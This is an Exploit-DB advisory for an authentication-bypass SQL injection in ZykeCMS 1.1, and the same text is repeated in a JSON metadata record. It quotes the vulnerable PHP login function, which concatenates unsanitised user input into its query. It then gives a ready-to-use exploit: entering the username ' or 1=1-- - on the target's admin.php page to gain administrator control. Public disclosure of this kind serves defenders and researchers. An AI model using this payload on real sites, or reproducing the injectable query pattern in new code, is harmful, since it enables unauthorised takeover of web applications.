ID EDB-ID:12262
Type exploitdb
Reporter Giuseppe 'giudinvx' D'Inverno
Modified 2010-04-16T00:00:00
Description
ZykeCMS V1.1 (Auth Bypass) SQL Injection Vulnerability. Webapps exploit for php platform
======================================================
ZykeCMS V1.1 (Auth Bypass) SQL Injection Vulnerability
======================================================
Author : Giuseppe 'giudinvx' D'Inverno
Email : <giudinvx[at]gmail[dot]com>
Date : 04-16-2010
Site : http://www.giudinvx.altervista.org/
Location : Naples, Italy
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Application Info:
Site : http://www.zykecms.com/
Version: 1.1
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
[·] Vulnerable code in /zykecms/conf/functions.php | /zykecms/admin.php
<?php
// admin.php
··········
if ($_POST['login'] != "" and $_POST['password'] != "")
{
if (check_login($_POST['login'], $_POST['password']) == true)
{
if ($_SESSION['function'] == 1)
header('Location: admin/');
else
header('Location: ');
$error_login = "";
}
else
··········
//functions.php
··········
function check_login($login, $password)
{
$sql = "SELECT * FROM users WHERE login='".$login."' AND
password='".md5($password)."'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
$data = mysql_fetch_array($result);
// echo $sql;
if ($num == 1)
{
session_start();
$_SESSION['last_access']=time();
$_SESSION['function']=$data['function'];
$_SESSION['login']=$data['login'];
$_SESSION['firstname']=$data['firstname'];
$_SESSION['lastname']=$data['lastname'];
$_SESSION['date']=$data['date'];
$_SESSION['id']=$data['id'];
return true;
}
else
return false;
}
·········
?>
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
[·] Exploit
Frist of all join login page:
http://[target]/[path]/admin.php
Username: ' or 1=1-- -
Password: 1
Now have admin control.
{"id": "EDB-ID:12262", "type": "exploitdb", "bulletinFamily": "exploit", "title": "ZykeCMS 1.1 - Auth Bypass SQL Injection Vulnerability", "description": "ZykeCMS V1.1 (Auth Bypass) SQL Injection Vulnerability. Webapps exploit for php platform", "published": "2010-04-16T00:00:00", "modified": "2010-04-16T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/12262/", "reporter": "Giuseppe 'giudinvx' D'Inverno", "references": [], "cvelist": [], "lastseen": "2016-02-01T16:04:51", "viewCount": 6, "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2016-02-01T16:04:51", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-01T16:04:51", "rev": 2}, "vulnersScore": 0.7}, "sourceHref": "https://www.exploit-db.com/download/12262/", "sourceData": "======================================================\r\nZykeCMS V1.1 (Auth Bypass) SQL Injection Vulnerability\r\n======================================================\r\n\r\nAuthor : Giuseppe 'giudinvx' D'Inverno\r\nEmail : <giudinvx[at]gmail[dot]com>\r\nDate : 04-16-2010\r\nSite : http://www.giudinvx.altervista.org/\r\nLocation : Naples, Italy\r\n\r\n\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\r\nApplication Info:\r\nSite : http://www.zykecms.com/\r\nVersion: 1.1\r\n\r\n\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\r\n[\u00b7] Vulnerable code in /zykecms/conf/functions.php | /zykecms/admin.php\r\n\r\n<?php\r\n// admin.php\r\n\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\r\nif ($_POST['login'] != \"\" and $_POST['password'] != \"\")\r\n{\r\nif (check_login($_POST['login'], $_POST['password']) == true)\r\n{\r\nif ($_SESSION['function'] == 1)\r\nheader('Location: admin/');\r\nelse\r\nheader('Location: ');\r\n\r\n$error_login = \"\";\r\n}\r\nelse\r\n\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\r\n//functions.php\r\n\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\r\nfunction check_login($login, $password)\r\n{\r\n$sql = \"SELECT * FROM users WHERE login='\".$login.\"' AND\r\npassword='\".md5($password).\"'\";\r\n$result = mysql_query($sql);\r\n$num = mysql_num_rows($result);\r\n$data = mysql_fetch_array($result);\r\n// echo $sql;\r\nif ($num == 1)\r\n{\r\nsession_start();\r\n$_SESSION['last_access']=time();\r\n$_SESSION['function']=$data['function'];\r\n$_SESSION['login']=$data['login'];\r\n$_SESSION['firstname']=$data['firstname'];\r\n$_SESSION['lastname']=$data['lastname'];\r\n$_SESSION['date']=$data['date'];\r\n$_SESSION['id']=$data['id'];\r\nreturn true;\r\n}\r\nelse\r\nreturn false;\r\n}\r\n\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\r\n?>\r\n\r\n\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\u00af\r\n[\u00b7] Exploit\r\n\r\nFrist of all join login page:\r\n\r\nhttp://[target]/[path]/admin.php\r\n\r\nUsername: ' or 1=1-- -\r\nPassword: 1\r\n\r\nNow have admin control.", "osvdbidlist": []}
{}
